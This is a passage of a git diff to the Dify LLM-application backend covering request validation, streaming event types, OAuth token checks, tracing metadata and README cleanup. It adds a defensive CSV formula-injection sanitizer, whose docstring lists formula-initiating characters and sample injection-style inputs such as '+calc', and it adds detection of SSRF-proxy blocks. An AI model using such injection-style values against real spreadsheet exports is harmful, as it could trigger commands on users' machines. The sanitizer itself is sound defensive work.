location="json") - .add_argument("query", type=str, required=True, location="json") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("conversation_id", type=uuid_value, location="json") - .add_argument("parent_message_id", type=uuid_value, required=False, location="json") - .add_argument("retriever_from", type=str, required=False, default="web_app", location="json") - ) + payload = ChatMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: diff --git a/api/core/app/app_config/entities.py b/api/core/app/app_config/entities.py index 93f2742599..307af3747c 100644 --- a/api/core/app/app_config/entities.py +++ b/api/core/app/app_config/entities.py @@ -1,3 +1,4 @@ +import json from collections.abc import Sequence from enum import StrEnum, auto from typing import Any, Literal @@ -120,7 +121,7 @@ class VariableEntity(BaseModel): allowed_file_types: Sequence[FileType] | None = Field(default_factory=list) allowed_file_extensions: Sequence[str] | None = Field(default_factory=list) allowed_file_upload_methods: Sequence[FileTransferMethod] | None = Field(default_factory=list) - json_schema: dict[str, Any] | None = Field(default=None) + json_schema: str | None = Field(default=None) @field_validator("description", mode="before") @classmethod @@ -134,11 +135,17 @@ class VariableEntity(BaseModel): @field_validator("json_schema") @classmethod - def validate_json_schema(cls, schema: dict[str, Any] | None) -> dict[str, Any] | None: + def validate_json_schema(cls, schema: str | None) -> str | None: if schema is None: return None + try: - Draft7Validator.check_schema(schema) + json_schema = json.loads(schema) + except json.JSONDecodeError: + 
raise ValueError(f"invalid json_schema value {schema}") + + try: + Draft7Validator.check_schema(json_schema) except SchemaError as e: raise ValueError(f"Invalid JSON schema: {e.message}") return schema diff --git a/api/core/app/apps/base_app_generator.py b/api/core/app/apps/base_app_generator.py index 1b0474142e..02d58a07d1 100644 --- a/api/core/app/apps/base_app_generator.py +++ b/api/core/app/apps/base_app_generator.py @@ -1,3 +1,4 @@ +import json from collections.abc import Generator, Mapping, Sequence from typing import TYPE_CHECKING, Any, Union, final @@ -175,6 +176,13 @@ class BaseAppGenerator: value = True elif value == 0: value = False + case VariableEntityType.JSON_OBJECT: + if not isinstance(value, str): + raise ValueError(f"{variable_entity.variable} in input form must be a string") + try: + json.loads(value) + except json.JSONDecodeError: + raise ValueError(f"{variable_entity.variable} in input form must be a valid JSON object") case _: raise AssertionError("this statement should be unreachable.") diff --git a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py index 5c169f4db1..5bb93fa44a 100644 --- a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py +++ b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py @@ -342,9 +342,11 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): self._task_state.llm_result.message.content = current_content if isinstance(event, QueueLLMChunkEvent): + event_type = self._message_cycle_manager.get_message_event_type(message_id=self._message_id) yield self._message_cycle_manager.message_to_stream_response( answer=cast(str, delta_text), message_id=self._message_id, + event_type=event_type, ) else: yield self._agent_message_to_stream_response( diff --git a/api/core/app/task_pipeline/message_cycle_manager.py b/api/core/app/task_pipeline/message_cycle_manager.py index 2e6f92efa5..0e7f300cee 100644 
--- a/api/core/app/task_pipeline/message_cycle_manager.py +++ b/api/core/app/task_pipeline/message_cycle_manager.py @@ -5,7 +5,7 @@ from threading import Thread from typing import Union from flask import Flask, current_app -from sqlalchemy import select +from sqlalchemy import exists, select from sqlalchemy.orm import Session from configs import dify_config @@ -54,6 +54,20 @@ class MessageCycleManager: ): self._application_generate_entity = application_generate_entity self._task_state = task_state + self._message_has_file: set[str] = set() + + def get_message_event_type(self, message_id: str) -> StreamEvent: + if message_id in self._message_has_file: + return StreamEvent.MESSAGE_FILE + + with Session(db.engine, expire_on_commit=False) as session: + has_file = session.query(exists().where(MessageFile.message_id == message_id)).scalar() + + if has_file: + self._message_has_file.add(message_id) + return StreamEvent.MESSAGE_FILE + + return StreamEvent.MESSAGE def generate_conversation_name(self, *, conversation_id: str, query: str) -> Thread | None: """ @@ -214,7 +228,11 @@ class MessageCycleManager: return None def message_to_stream_response( - self, answer: str, message_id: str, from_variable_selector: list[str] | None = None + self, + answer: str, + message_id: str, + from_variable_selector: list[str] | None = None, + event_type: StreamEvent | None = None, ) -> MessageStreamResponse: """ Message to stream response. 
@@ -222,16 +240,12 @@ class MessageCycleManager: :param message_id: message id :return: """ - with Session(db.engine, expire_on_commit=False) as session: - message_file = session.scalar(select(MessageFile).where(MessageFile.id == message_id)) - event_type = StreamEvent.MESSAGE_FILE if message_file else StreamEvent.MESSAGE - return MessageStreamResponse( task_id=self._application_generate_entity.task_id, id=message_id, answer=answer, from_variable_selector=from_variable_selector, - event=event_type, + event=event_type or StreamEvent.MESSAGE, ) def message_replace_to_stream_response(self, answer: str, reason: str = "") -> MessageReplaceStreamResponse: diff --git a/api/core/db/__init__.py b/api/core/db/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/db/session_factory.py b/api/core/db/session_factory.py new file mode 100644 index 0000000000..1dae2eafd4 --- /dev/null +++ b/api/core/db/session_factory.py @@ -0,0 +1,38 @@ +from sqlalchemy import Engine +from sqlalchemy.orm import Session, sessionmaker + +_session_maker: sessionmaker | None = None + + +def configure_session_factory(engine: Engine, expire_on_commit: bool = False): + """Configure the global session factory""" + global _session_maker + _session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit) + + +def get_session_maker() -> sessionmaker: + if _session_maker is None: + raise RuntimeError("Session factory not configured. 
Call configure_session_factory() first.") + return _session_maker + + +def create_session() -> Session: + return get_session_maker()() + + +# Class wrapper for convenience +class SessionFactory: + @staticmethod + def configure(engine: Engine, expire_on_commit: bool = False): + configure_session_factory(engine, expire_on_commit) + + @staticmethod + def get_session_maker() -> sessionmaker: + return get_session_maker() + + @staticmethod + def create_session() -> Session: + return create_session() + + +session_factory = SessionFactory() diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index bed3a35400..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel, Field +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str | None = Field(default="", description="knowledge dataset description") + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/api/core/entities/mcp_provider.py b/api/core/entities/mcp_provider.py index 7484cea04a..7fdf5e4be6 100644 --- a/api/core/entities/mcp_provider.py +++ b/api/core/entities/mcp_provider.py @@ -213,12 +213,23 @@ class MCPProviderEntity(BaseModel): return None def retrieve_tokens(self) -> OAuthTokens | None: - """OAuth tokens if available""" + """Retrieve OAuth tokens if authentication is complete. + + Returns: + OAuthTokens if the provider has been authenticated, None otherwise. 
+ """ if not self.credentials: return None credentials = self.decrypt_credentials() + access_token = credentials.get("access_token", "") + # Return None if access_token is empty to avoid generating invalid "Authorization: Bearer " header. + # Note: We don't check for whitespace-only strings here because: + # 1. OAuth servers don't return whitespace-only access tokens in practice + # 2. Even if they did, the server would return 401, triggering the OAuth flow correctly + if not access_token: + return None return OAuthTokens( - access_token=credentials.get("access_token", ""), + access_token=access_token, token_type=credentials.get("token_type", DEFAULT_TOKEN_TYPE), expires_in=int(credentials.get("expires_in", str(DEFAULT_EXPIRES_IN)) or DEFAULT_EXPIRES_IN), refresh_token=credentials.get("refresh_token", ""), diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. + """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. 
+ + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. 
+ + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. 
" + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/llm_generator/llm_generator.py b/api/core/llm_generator/llm_generator.py index 4a577e6c38..b4c3ec1caf 100644 --- a/api/core/llm_generator/llm_generator.py +++ b/api/core/llm_generator/llm_generator.py @@ -72,15 +72,22 @@ class LLMGenerator: prompt_messages=list(prompts), model_parameters={"max_tokens": 500, "temperature": 1}, stream=False ) answer = cast(str, response.message.content) - cleaned_answer = re.sub(r"^.*(\{.*\}).*$", r"\1", answer, flags=re.DOTALL) - if cleaned_answer is None: + if answer is None: return "" try: - result_dict = json.loads(cleaned_answer) - answer = result_dict["Your Output"] + result_dict = json.loads(answer) except json.JSONDecodeError: - logger.exception("Failed to generate name after answer, use query instead") + result_dict = json_repair.loads(answer) + + if not isinstance(result_dict, dict): answer = query + else: + output = result_dict.get("Your Output") + if isinstance(output, str) and output.strip(): + answer = output.strip() + else: + answer = query + name = answer.strip() if len(name) > 75: diff --git a/api/core/model_runtime/README.md b/api/core/model_runtime/README.md index a6caa7eb1e..b9d2c55210 100644 --- a/api/core/model_runtime/README.md +++ b/api/core/model_runtime/README.md @@ -18,34 +18,20 @@ This module provides the interface for invoking and authenticating various model - Model provider display - ![image-20231210143654461](./docs/en_US/images/index/image-20231210143654461.png) - - Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. For detailed rule design, see: [Schema](./docs/en_US/schema.md). + Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. 
- Selectable model list display - ![image-20231210144229650](./docs/en_US/images/index/image-20231210144229650.png) - After configuring provider/model credentials, the dropdown (application orchestration interface/default model) allows viewing of the available LLM list. Greyed out items represent predefined model lists from providers without configured credentials, facilitating user review of supported models. - In addition, this list also returns configurable parameter information and rules for LLM, as shown below: - - ![image-20231210144814617](./docs/en_US/images/index/image-20231210144814617.png) - - These parameters are all defined in the backend, allowing different settings for various parameters supported by different models, as detailed in: [Schema](./docs/en_US/schema.md#ParameterRule). + In addition, this list also returns configurable parameter information and rules for LLM. These parameters are all defined in the backend, allowing different settings for various parameters supported by different models. - Provider/model credential authentication - ![image-20231210151548521](./docs/en_US/images/index/image-20231210151548521.png) - - ![image-20231210151628992](./docs/en_US/images/index/image-20231210151628992.png) - - The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. The first image above is a provider credential DEMO, and the second is a model credential DEMO. + The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. 
## Structure -![](./docs/en_US/images/index/image-20231210165243632.png) - Model Runtime is divided into three layers: - The outermost layer is the factory method @@ -60,9 +46,6 @@ Model Runtime is divided into three layers: It offers direct invocation of various model types, predefined model configuration information, getting predefined/remote model lists, model credential authentication methods. Different models provide additional special methods, like LLM's pre-computed tokens method, cost information obtaining method, etc., **allowing horizontal expansion** for different models under the same provider (within supported model types). -## Next Steps +## Documentation -- Add new provider configuration: [Link](./docs/en_US/provider_scale_out.md) -- Add new models for existing providers: [Link](./docs/en_US/provider_scale_out.md#AddModel) -- View YAML configuration rules: [Link](./docs/en_US/schema.md) -- Implement interface methods: [Link](./docs/en_US/interfaces.md) +For detailed documentation on how to add new providers or models, please refer to the [Dify documentation](https://docs.dify.ai/). 
diff --git a/api/core/model_runtime/README_CN.md b/api/core/model_runtime/README_CN.md index dfe614347a..0a8b56b3fe 100644 --- a/api/core/model_runtime/README_CN.md +++ b/api/core/model_runtime/README_CN.md @@ -18,34 +18,20 @@ - 模型供应商展示 - ![image-20231210143654461](./docs/zh_Hans/images/index/image-20231210143654461.png) - -​ 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等,规则设计详见:[Schema](./docs/zh_Hans/schema.md)。 + 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等。 - 可选择的模型列表展示 - ![image-20231210144229650](./docs/zh_Hans/images/index/image-20231210144229650.png) + 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 -​ 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 - -​ 除此之外,该列表还返回了 LLM 可配置的参数信息和规则,如下图: - -​ ![image-20231210144814617](./docs/zh_Hans/images/index/image-20231210144814617.png) - -​ 这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数,详见:[Schema](./docs/zh_Hans/schema.md#ParameterRule)。 + 除此之外,该列表还返回了 LLM 可配置的参数信息和规则。这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数。 - 供应商/模型凭据鉴权 - ![image-20231210151548521](./docs/zh_Hans/images/index/image-20231210151548521.png) - -![image-20231210151628992](./docs/zh_Hans/images/index/image-20231210151628992.png) - -​ 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权,上图 1 为供应商凭据 DEMO,上图 2 为模型凭据 DEMO。 + 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权。 ## 结构 -![](./docs/zh_Hans/images/index/image-20231210165243632.png) - Model Runtime 分三层: - 最外层为工厂方法 @@ -59,8 +45,7 @@ Model Runtime 分三层: 对于供应商/模型凭据,有两种情况 - 如 OpenAI 这类中心化供应商,需要定义如**api_key**这类的鉴权凭据 - - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据,就像下面这样,当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 - ![Alt text](docs/zh_Hans/images/index/image.png) + - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据。当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 
当配置好凭据后,就可以通过 DifyRuntime 的外部接口直接获取到对应供应商所需要的**Schema**(凭据表单规则),从而在可以在不修改前端逻辑的情况下,提供新的供应商/模型的支持。 @@ -74,20 +59,6 @@ Model Runtime 分三层: - 模型凭据 (**在供应商层定义**):这是一类不经常变动,一般在配置好后就不会再变动的参数,如 **api_key**、**server_url** 等。在 DifyRuntime 中,他们的参数名一般为**credentials: dict[str, any]**,Provider 层的 credentials 会直接被传递到这一层,不需要再单独定义。 -## 下一步 +## 文档 -### [增加新的供应商配置 👈🏻](./docs/zh_Hans/provider_scale_out.md) - -当添加后,这里将会出现一个新的供应商 - -![Alt text](docs/zh_Hans/images/index/image-1.png) - -### [为已存在的供应商新增模型 👈🏻](./docs/zh_Hans/provider_scale_out.md#%E5%A2%9E%E5%8A%A0%E6%A8%A1%E5%9E%8B) - -当添加后,对应供应商的模型列表中将会出现一个新的预定义模型供用户选择,如 GPT-3.5 GPT-4 ChatGLM3-6b 等,而对于支持自定义模型的供应商,则不需要新增模型。 - -![Alt text](docs/zh_Hans/images/index/image-2.png) - -### [接口的具体实现 👈🏻](./docs/zh_Hans/interfaces.md) - -你可以在这里找到你想要查看的接口的具体实现,以及接口的参数和返回值的具体含义。 +有关如何添加新供应商或模型的详细文档,请参阅 [Dify 文档](https://docs.dify.ai/)。 diff --git a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py index 347992fa0d..a7b73e032e 100644 --- a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py +++ b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py @@ -6,7 +6,13 @@ from datetime import datetime, timedelta from typing import Any, Union, cast from urllib.parse import urlparse -from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes +from openinference.semconv.trace import ( + MessageAttributes, + OpenInferenceMimeTypeValues, + OpenInferenceSpanKindValues, + SpanAttributes, + ToolCallAttributes, +) from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk @@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra def datetime_to_nanos(dt: datetime | None) -> int: - """Convert datetime 
to nanoseconds since epoch. If None, use current time.""" + """Convert datetime to nanoseconds since epoch for Arize/Phoenix.""" if dt is None: dt = datetime.now() return int(dt.timestamp() * 1_000_000_000) def error_to_string(error: Exception | str | None) -> str: - """Convert an error to a string with traceback information.""" + """Convert an error to a string with traceback information for Arize/Phoenix.""" error_message = "Empty Stack Trace" if error: if isinstance(error, Exception): @@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str: def set_span_status(current_span: Span, error: Exception | str | None = None): - """Set the status of the current span based on the presence of an error.""" + """Set the status of the current span based on the presence of an error for Arize/Phoenix.""" if error: error_string = error_to_string(error) current_span.set_status(Status(StatusCode.ERROR, error_string)) @@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None): def safe_json_dumps(obj: Any) -> str: - """A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded.""" + """A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix.""" return json.dumps(obj, default=str, ensure_ascii=False) +def wrap_span_metadata(metadata, **kwargs): + """Add common metadata to all trace entity types for Arize/Phoenix.""" + metadata["created_from"] = "Dify" + metadata.update(kwargs) + return metadata + + class ArizePhoenixDataTrace(BaseTraceInstance): def __init__( self, @@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise def workflow_trace(self, trace_info: WorkflowTraceInfo): - workflow_metadata = { - "workflow_run_id": trace_info.workflow_run_id or "", - "message_id": trace_info.message_id or "", - "workflow_app_log_id": trace_info.workflow_app_log_id or "", - "status": trace_info.workflow_run_status or "", - "status_message":
trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - } - workflow_metadata.update(trace_info.metadata) + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] + + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.workflow_run_status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="workflow", + conversation_id=trace_info.conversation_id or "", + workflow_app_log_id=trace_info.workflow_app_log_id or "", + workflow_id=trace_info.workflow_id or "", + tenant_id=trace_info.tenant_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0, + workflow_run_version=trace_info.workflow_run_version or "", + total_tokens=trace_info.total_tokens or 0, + file_list=safe_json_dumps(file_list), + query=trace_info.query or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id self.ensure_root_span(dify_trace_id) @@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): workflow_span = self.tracer.start_span( name=TraceTaskName.WORKFLOW_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs), + SpanAttributes.OUTPUT_MIME_TYPE: 
OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), @@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance): "app_id": app_id, "app_name": node_execution.title, "status": node_execution.status, + "status_message": node_execution.error or "", "level": "ERROR" if node_execution.status == "failed" else "DEFAULT", } ) @@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance): node_span = self.tracer.start_span( name=node_execution.node_type, attributes={ + SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value), SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value), SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, - SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.METADATA: safe_json_dumps(node_metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, @@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def message_trace(self, trace_info: MessageTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.") return - file_list = cast(list[str], trace_info.file_list) or [] + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] message_file_data: MessageFile | None = trace_info.message_file_data if message_file_data is not None: file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else "" file_list.append(file_url) - message_metadata = { - "message_id": trace_info.message_id or "", - "conversation_mode": str(trace_info.conversation_mode or ""), - "user_id": trace_info.message_data.from_account_id or "", - "file_list": json.dumps(file_list), - "status": 
trace_info.message_data.status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - "prompt_tokens": trace_info.message_tokens or 0, - "completion_tokens": trace_info.answer_tokens or 0, - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - message_metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="message", + conversation_model=trace_info.conversation_model or "", + message_tokens=trace_info.message_tokens or 0, + answer_tokens=trace_info.answer_tokens or 0, + total_tokens=trace_info.total_tokens or 0, + conversation_mode=trace_info.conversation_mode or "", + gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0, + llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0, + is_streaming_request=trace_info.is_streaming_request or False, + user_id=trace_info.message_data.from_account_id or "", + file_list=safe_json_dumps(file_list), + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) # Add end user data if available if trace_info.message_data.from_end_user_id: @@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance): db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first() ) if end_user_data is not None: - message_metadata["end_user_id"] = end_user_data.session_id + metadata["end_user_id"] = end_user_data.session_id attributes = { - SpanAttributes.INPUT_VALUE: trace_info.message_data.query, - SpanAttributes.OUTPUT_VALUE: 
trace_info.message_data.answer, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.INPUT_VALUE: trace_info.message_data.query, + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } dify_trace_id = trace_info.trace_id or trace_info.message_id @@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance): try: # Convert outputs to string based on type + outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value if isinstance(trace_info.outputs, dict | list): - outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False) + outputs_str = safe_json_dumps(trace_info.outputs) + outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value elif isinstance(trace_info.outputs, str): outputs_str = trace_info.outputs else: @@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): llm_attributes = { SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value, - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: outputs_str, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } 
llm_attributes.update(self._construct_llm_attributes(trace_info.inputs)) if trace_info.total_tokens is not None and trace_info.total_tokens > 0: @@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def moderation_trace(self, trace_info: ModerationTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_name": "moderation", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="moderation", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.MODERATION_TRACE.value, 